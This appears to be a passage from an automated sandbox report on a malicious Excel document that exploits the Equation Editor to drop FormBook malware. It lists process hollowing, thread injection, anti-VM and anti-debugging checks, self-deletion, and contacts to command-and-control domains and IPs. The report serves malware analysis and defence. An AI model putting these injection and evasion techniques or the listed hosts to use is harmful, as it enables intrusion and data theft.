Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FA20 NtQueryInformationFile, 7_2_0251FA20
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FBE8 NtQueryVirtualMemory, 7_2_0251FBE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F8CC NtWaitForSingleObject, 7_2_0251F8CC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02521930 NtSetContextThread, 7_2_02521930
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F938 NtWriteFile, 7_2_0251F938
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FE24 NtWriteVirtualMemory, 7_2_0251FE24
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FEA0 NtReadVirtualMemory, 7_2_0251FEA0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FF34 NtQueueApcThread, 7_2_0251FF34
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FFFC NtCreateProcessEx, 7_2_0251FFFC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520C40 NtGetContextThread, 7_2_02520C40
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC48 NtSetInformationFile, 7_2_0251FC48
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC30 NtOpenProcess, 7_2_0251FC30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC90 NtUnmapViewOfSection, 7_2_0251FC90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FD5C NtEnumerateKey, 7_2_0251FD5C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02521D80 NtSuspendThread, 7_2_02521D80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F85E0 NtCreateFile, 7_2_000F85E0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F8690 NtReadFile, 7_2_000F8690
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F8710 NtClose, 7_2_000F8710
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F87C0 NtAllocateVirtualMemory, 7_2_000F87C0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F85DA NtCreateFile, 7_2_000F85DA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F870B NtClose, 7_2_000F870B
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 7916.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Tries to load missing DLLs
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msvbvm60.dll
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\Pcportk28.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\Pcportk28.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76E90000 page execute and read and write
Source: i4L[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Pcportk28.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Users\Public\Pcportk28.exe Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR379.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/6@6/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\Pcportk28.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\Pcportk28.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: SWIFT - Copy - Copy.xlsx Static file information: File size 1400294 > 1048576
Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
Source: SWIFT - Copy - Copy.xlsx Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker
Source: i4L[1].exe.2.dr, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Pcportk28.exe.2.dr, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: i4L[1].exe.2.dr, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: Pcportk28.exe.2.dr, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\Pcportk28.exe Code function: 4_2_010E9A2A push es; retf 4_2_010E9A37
Source: C:\Users\Public\Pcportk28.exe Code function: 4_2_010E9767 push 3A000004h; retf 0000h 4_2_010E976C
Source: C:\Users\Public\Pcportk28.exe Code function: 4_2_010EA0FF push es; iretd 4_2_010EA151
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B822 push eax; ret 5_2_0041B828
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B82B push eax; ret 5_2_0041B892
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B88C push eax; ret 5_2_0041B892
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004153E0 push es; retf 5_2_004153E9
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00415C4E push ebp; ret 5_2_00415C57
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041CD74 push eax; ret 5_2_0041CD76
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00414EAF pushad ; ret 5_2_00414EB0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041CF70 pushad ; ret 5_2_0041CF74
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_010EA0FF push es; iretd 5_2_010EA151
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_010E9A2A push es; retf 5_2_010E9A37
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_010E9767 push 3A000004h; retf 0000h 5_2_010E976C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0252DFA1 push ecx; ret 7_2_0252DFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F53E0 push es; retf 7_2_000F53E9
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB7D5 push eax; ret 7_2_000FB828
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB82B push eax; ret 7_2_000FB892
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB822 push eax; ret 7_2_000FB828
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB88C push eax; ret 7_2_000FB892
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F5C4E push ebp; ret 7_2_000F5C57
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FCD74 push eax; ret 7_2_000FCD76
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F4EAF pushad ; ret 7_2_000F4EB0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FCF70 pushad ; ret 7_2_000FCF74
Source: initial sample Static PE information: section name: .text entropy: 7.09183457807

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wininit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 4.2.Pcportk28.exe.259637c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.259e388.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.25b30a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Pcportk28.exe PID: 2124, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\Pcportk28.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Pcportk28.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000E8604 second address: 00000000000E860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000E899E second address: 00000000000E89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780 Thread sleep time: -180000s >= -30000s
Source: C:\Users\Public\Pcportk28.exe TID: 836 Thread sleep time: -34932s >= -30000s
Source: C:\Users\Public\Pcportk28.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\wininit.exe TID: 672 Thread sleep time: -38000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\wininit.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004088D0 rdtsc 5_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\Pcportk28.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Pcportk28.exe Process information queried: ProcessInformation
Source: C:\Users\Public\Pcportk28.exe Thread delayed: delay time: 34932
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: Pcportk28.exe, 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp Binary or memory string: +Qemu
Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.487654318.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004088D0 rdtsc 5_2_004088D0
Enables debug privileges
Source: C:\Users\Public\Pcportk28.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wininit.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008626F8 mov eax, dword ptr fs:[00000030h] 5_2_008626F8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025326F8 mov eax, dword ptr fs:[00000030h] 7_2_025326F8
Checks if the current process is being debugged
Source: C:\Users\Public\Pcportk28.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wininit.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00409B40 LdrLoadDll, 5_2_00409B40
Source: C:\Users\Public\Pcportk28.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.209.73 80
Source: C:\Windows\explorer.exe Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe Network Connect: 118.67.131.217 80
Source: C:\Windows\explorer.exe Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe Network Connect: 216.239.34.21 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Sample uses process hollowing technique
Source: C:\Users\Public\Pcportk28.exe Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 6F0000
Maps a DLL or memory area into another process
Source: C:\Users\Public\Pcportk28.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\Pcportk28.exe Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\Public\Pcportk28.exe Memory written: C:\Users\Public\Pcportk28.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\Pcportk28.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\Pcportk28.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\wininit.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Users\Public\Pcportk28.exe Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\Pcportk28.exe Queries volume information: C:\Users\Public\Pcportk28.exe VolumeInformation
Source: C:\Users\Public\Pcportk28.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\Pcportk28.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY